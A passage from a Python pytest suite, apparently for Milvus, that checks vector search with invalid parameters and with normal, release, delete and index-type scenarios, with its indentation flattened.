self.connection_wrap.remove_connection(alias='default')
log.info("test_search_no_connection: removed connection")
# 3. search without connection
log.info("test_search_no_connection: searching without connection")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "should create connect first"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_collection(self):
"""
target: test the scenario which search the non-exist collection
method: 1. create collection
2. drop collection
3. search the dropped collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. Drop collection
collection_w.drop()
# 3. Search without collection
log.info("test_search_no_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s doesn't exist!" % collection_w.name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_missing(self):
"""
target: test search with incomplete parameters
method: search with incomplete parameters
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection with missing parameters
log.info("test_search_param_missing: Searching collection %s "
"with missing parameters" % collection_w.name)
try:
collection_w.search()
except TypeError as e:
assert "missing 4 required positional arguments: 'data', " \
"'anns_field', 'param', and 'limit'" in str(e)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_vectors(self, get_invalid_vectors):
"""
target: test search with invalid parameter values
method: search with invalid data
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_vectors = get_invalid_vectors
log.info("test_search_param_invalid_vectors: searching with "
"invalid vectors: {}".format(invalid_vectors))
collection_w.search(invalid_vectors, default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`search_data` value {} is illegal".format(invalid_vectors)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_dim(self):
"""
target: test search with invalid parameter values
method: search with invalid dim
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid dim
log.info("test_search_param_invalid_dim: searching with invalid dim")
wrong_dim = 129
vectors = [[random.random() for _ in range(wrong_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The dimension of query entities "
"is different from schema"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_type(self, get_invalid_fields_type):
"""
target: test search with invalid parameter type
method: search with invalid field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_type
log.info("test_search_param_invalid_field_type: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items=
{"err_code": 1,
"err_msg": "`anns_field` value {} is illegal".format(invalid_search_field)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_value(self, get_invalid_fields_value):
"""
target: test search with invalid parameter values
method: search with invalid field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_value
log.info("test_search_param_invalid_field_value: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Field %s doesn't exist in schema"
% invalid_search_field})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_metric_type(self, get_invalid_metric_type):
"""
target: test search with invalid parameter values
method: search with invalid metric type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. search with invalid metric_type
log.info("test_search_param_invalid_metric_type: searching with invalid metric_type")
invalid_metric = get_invalid_metric_type
search_params = {"metric_type": invalid_metric, "params": {"nprobe": 10}}
collection_w.search(vectors[:default_nq], default_search_field, search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "metric type not found"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6727")
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_invalid_params_type(self, index, params):
"""
target: test search with invalid search params
method: test search with invalid params type
expected: raise exception and report the error
"""
if index == "FLAT":
pytest.skip("skip in FLAT index")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
is_index=True)
# 2. create index and load
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
invalid_search_params = cf.gen_invaild_search_params_type()
for invalid_search_param in invalid_search_params:
if index == invalid_search_param["index_type"]:
search_params = {"metric_type": "L2", "params": invalid_search_param["search_params"]}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 0,
"err_msg": "metric type not found"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_limit_type(self, get_invalid_limit):
"""
target: test search with invalid limit type
method: search with invalid limit
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_limit = get_invalid_limit
log.info("test_search_param_invalid_limit_type: searching with "
"invalid limit: %s" % invalid_limit)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
invalid_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`limit` value %s is illegal" % invalid_limit})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("limit", [0, 16385])
def test_search_param_invalid_limit_value(self, limit):
"""
target: test search with invalid limit value
method: search with invalid limit: 0 and maximum
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid limit (topK)
log.info("test_search_param_invalid_limit: searching with "
"invalid limit (topK) = %s" % limit)
err_msg = "limit %d is too large!" % limit
if limit == 0:
err_msg = "`limit` value 0 is illegal"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_type(self, get_invalid_expr_type):
"""
target: test search with invalid parameter type
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_type
log.info("test_search_param_invalid_expr_type: searching with "
"invalid expr: {}".format(invalid_search_expr))
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The type of expr must be string ,"
"but {} is given".format(type(invalid_search_expr))})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_value(self, get_invalid_expr_value):
"""
target: test search with invalid parameter values
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_value
log.info("test_search_param_invalid_expr_value: searching with "
"invalid expr: %s" % invalid_search_expr)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "invalid expression %s"
% invalid_search_expr})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_invalid_type(self, get_invalid_partition):
"""
target: test search invalid partition
method: search with invalid partition type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search the invalid partition
partition_name = get_invalid_partition
err_msg = "`partition_name_array` value {} is illegal".format(partition_name)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, partition_name,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_invalid_type(self, get_invalid_output_fields):
"""
target: test search with output fields
method: search with invalid output_field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search
log.info("test_search_with_output_fields_invalid_type: Searching collection %s" % collection_w.name)
output_fields = get_invalid_output_fields
err_msg = "`output_fields` value {} is illegal".format(output_fields)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_collection(self):
"""
target: test searching a released collection
method: 1. create collection
2. release collection
3. search the released collection
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. release collection
collection_w.release()
# 3. Search the released collection
log.info("test_search_release_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s was not loaded "
"into memory" % collection_w.name})
@pytest.mark.tags(CaseLabel.L2)
def test_search_release_partition(self):
"""
target: test searching a released partition
method: 1. create collection
2. release partition
3. search with specifying the released partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 10, partition_num)[0]
par = collection_w.partitions
par_name = par[partition_num].name
# 2. release partition
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par_name])
# 3. Search the released partition
log.info("test_search_release_partition: Searching specifying the released partition")
limit = 10
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "partition has been released"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_collection(self):
"""
target: test search with an empty collection
method: search the empty collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection without data before load
log.info("test_search_with_empty_collection: Searching empty collection %s"
% collection_w.name)
err_msg = "collection" + collection_w.name + "was not loaded into memory"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, timeout=1,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
# 3. search collection without data after load
collection_w.load()
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
@pytest.mark.tags(CaseLabel.L1)
def test_search_partition_deleted(self):
"""
target: test search deleted partition
method: 1. search the collection
2. delete a partition
3. search the deleted partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
# 2. delete partitions
log.info("test_search_partition_deleted: deleting a partition")
par = collection_w.partitions
deleted_par_name = par[partition_num].name
collection_w.drop_partition(deleted_par_name)
log.info("test_search_partition_deleted: deleted a partition")
collection_w.load()
# 3. search after delete partitions
log.info("test_search_partition_deleted: searching deleted partition")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
[deleted_par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % deleted_par_name})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6731")
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_different_index_invalid_params(self, nq, dim, index, params, auto_id, _async):
"""
target: test search after creating different indexes with default search params
method: create different indexes and search with the default (possibly invalid) search params
expected: search successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create different index
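# PQ-based indexes (which use the m parameter) require dim to be divisible by m;
# if it is not, fall back to m = dim // 4, which always divides the dims used here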
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim//4
log.info("test_search_different_index_invalid_params: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_different_index_invalid_params: Created index-%s" % index)
collection_w.load()
# 3. search
log.info("test_search_different_index_invalid_params: Searching after creating index-%s" % index)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partition_not_existed(self):
"""
target: test search in a non-existent partition
method: search with a non-existent partition name
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search the non exist partition
partition_name = "search_non_exist"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, [partition_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % partition_name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_binary(self):
"""
target: test search within binary data (invalid parameter)
method: search with wrong metric type
expected: raise exception and report the error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
# 3. search with exception
binary_vectors = cf.gen_binary_vectors(3000, default_dim)[1]
wrong_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector", wrong_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "unsupported"})
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self):
"""
target: search binary collection using FLAT with L2
method: search binary collection using FLAT with L2
expected: raise exception and report error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. search and assert
query_raw_vector, binary_vectors = cf.gen_binary_vectors(2, default_dim)
search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search failed"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_not_exist(self):
"""
target: test search with a non-existent output field
method: search with a non-existent output_field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
log.info("test_search_with_output_fields_not_exist: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=["int63"],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: 'Field int63 not exist'})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("output_fields", [[default_search_field], ["%"]])
def test_search_output_field_vector(self, output_fields):
"""
target: test search with vector as output field
method: search with one vector output_field or
wildcard for vector
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search doesn't support "
"vector field as output_fields"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*%"], ["**"], ["*", "@"]])
def test_search_output_field_invalid_wildcard(self, output_fields):
"""
target: test search with invalid output wildcard
method: search with invalid output_field wildcard
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": f"Field {output_fields[-1]} not exist"})
class TestCollectionSearch(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function",
params=[default_nb, default_nb_medium])
def nb(self, request):
yield request.param
@pytest.fixture(scope="function", params=[2, 500])
def nq(self, request):
yield request.param
@pytest.fixture(scope="function", params=[8, 128])
def dim(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def auto_id(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def _async(self, request):
yield request.param
"""
******************************************************************
# The following are valid base cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_search_normal(self, nq, dim, auto_id):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)
# 2. search
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L0)
def test_search_with_hit_vectors(self, nq, dim, auto_id):
"""
target: test search with vectors in collections
method: create connection and collection, insert data, then search with vectors taken from the collection
expected: search successfully with limit(topK) and can be hit at top 1 (min distance is 0)
"""
collection_w, _vectors, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)
# get vectors that inserted into collection
vectors = np.array(_vectors[0]).tolist()
vectors = [vectors[i][-1] for i in range(nq)]
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
for hits in search_res:
# verify that the top-1 hit is the query vector itself, so the min distance is 0
assert hits.distances[0] == 0.0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_vectors(self, dim, auto_id, _async):
"""
target: test search with empty query vector
method: search using empty query vector
expected: search successfully with 0 results
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True,
auto_id=auto_id, dim=dim)[0]
# 2. search collection without data
log.info("test_search_with_empty_vectors: Searching collection %s "
"using empty vector" % collection_w.name)
collection_w.search([], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("search_params", [{}, {"params": {}}, {"params": {"nprobe": 10}}])
def test_search_normal_default_params(self, dim, auto_id, search_params, _async):
"""
target: test search with default search params
method: create connection, collection, insert and search with empty or default search params
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)
# 2. search
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_before_after_delete(self, nq, dim, auto_id, _async):
"""
target: test search function before and after deletion
method: 1. search the collection
2. delete a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_before_after_delete: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. delete partitions
log.info("test_search_before_after_delete: deleting a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
collection_w.drop_partition(par[partition_num].name)
log.info("test_search_before_after_delete: deleted a partition")
collection_w.load()
# 4. search non-deleted part after delete partitions
log.info("test_search_before_after_delete: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit-deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_one(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release a partition
3. search the collection
expected: entities in the released partition should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_one: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release one partition
log.info("test_search_partition_after_release_one: releasing a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[partition_num].name])
log.info("test_search_partition_after_release_one: released a partition")
# 4. search collection after release one partition
log.info("test_search_partition_after_release_one: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_all(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release all partitions
3. search the collection
expected: no entities should be returned after all partitions are released
"""
# 1. initialize with data
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_all: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release all partitions
log.info("test_search_partition_after_release_all: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[0].name, par[1].name])
log.info("test_search_partition_after_release_all: released a partition")
# 4. search collection after release all partitions
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release collection
3. load collection
4. search the pre-released collection
expected: search successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)
# 2. release collection
collection_w.release()
# 3. Search the pre-released collection after load
collection_w.load()
log.info("test_search_collection_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6997")
def test_search_partition_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released partition after load
method: 1. create collection
2. release a partition
3. load partition
4. search the pre-released partition
expected: search successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)
# 2. release a partition
log.info("test_search_partition_after_release_load: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[1].name])
log.info("test_search_partition_after_release_load: released a partition")
# 3. Search the collection after load
limit = 1000
collection_w.load()
log.info("test_search_partition_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 4. Search the pre-released partition after load
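# the expected hit count is capped by the number of entities left in that partition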
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp,
[par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_load_flush_load(self, nb, nq, dim, auto_id, _async):
"""
target: test search when load before flush
method: 1. create collection and insert data
2. load before flush
3. flush, load again and search
expected: search success with limit(topK)
"""
# 1. create collection without inserting data
collection_w = self.init_collection_general(prefix, auto_id=auto_id, dim=dim)[0]
# 2. insert data
insert_ids = cf.insert_data(collection_w, nb, auto_id=auto_id, dim=dim)[3]
# 3. load data
collection_w.load()
# 4. flush and load
collection_w.num_entities
collection_w.load()
# 5. search after flush and load
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_new_data(self, nq, dim, auto_id, _async):
"""
target: test search new inserted data without load
method: 1. search the collection
2. insert new data
3. search the collection without load again
expected: new data should be searched
"""
# 1. initialize with data
limit = 1000
nb_old = 500
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb_old,
auto_id=auto_id,
dim=dim)
# 2. search for original data after load
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_new_data: searching for original data after load")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old,
"_async": _async})
# 3. insert new data
nb_new = 300
insert_ids_new = cf.insert_data(collection_w, nb_new,
auto_id=auto_id, dim=dim)[3]
insert_ids.extend(insert_ids_new)
# gracefulTime defaults to 1s; newly inserted data may not be
# searchable until gracefulTime has elapsed
time.sleep(gracefulTime)
# 4. search for new data without load
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old+nb_new,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_max_dim(self, nq, auto_id, _async):
"""
target: test search with the maximum vector dimension
method: create connection, collection with max_dim, insert and search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, default_nb,
auto_id=auto_id,
dim=max_dim)
# 2. search
log.info("test_search_max_dim: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(max_dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, 2,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_different_index_with_params(self, dim, index, params, auto_id, _async):
"""
target: test search after creating different indexes
method: create different indexes, then search with the corresponding search params
expected: search successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)
# 2. create index and load
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim//4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim//4
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
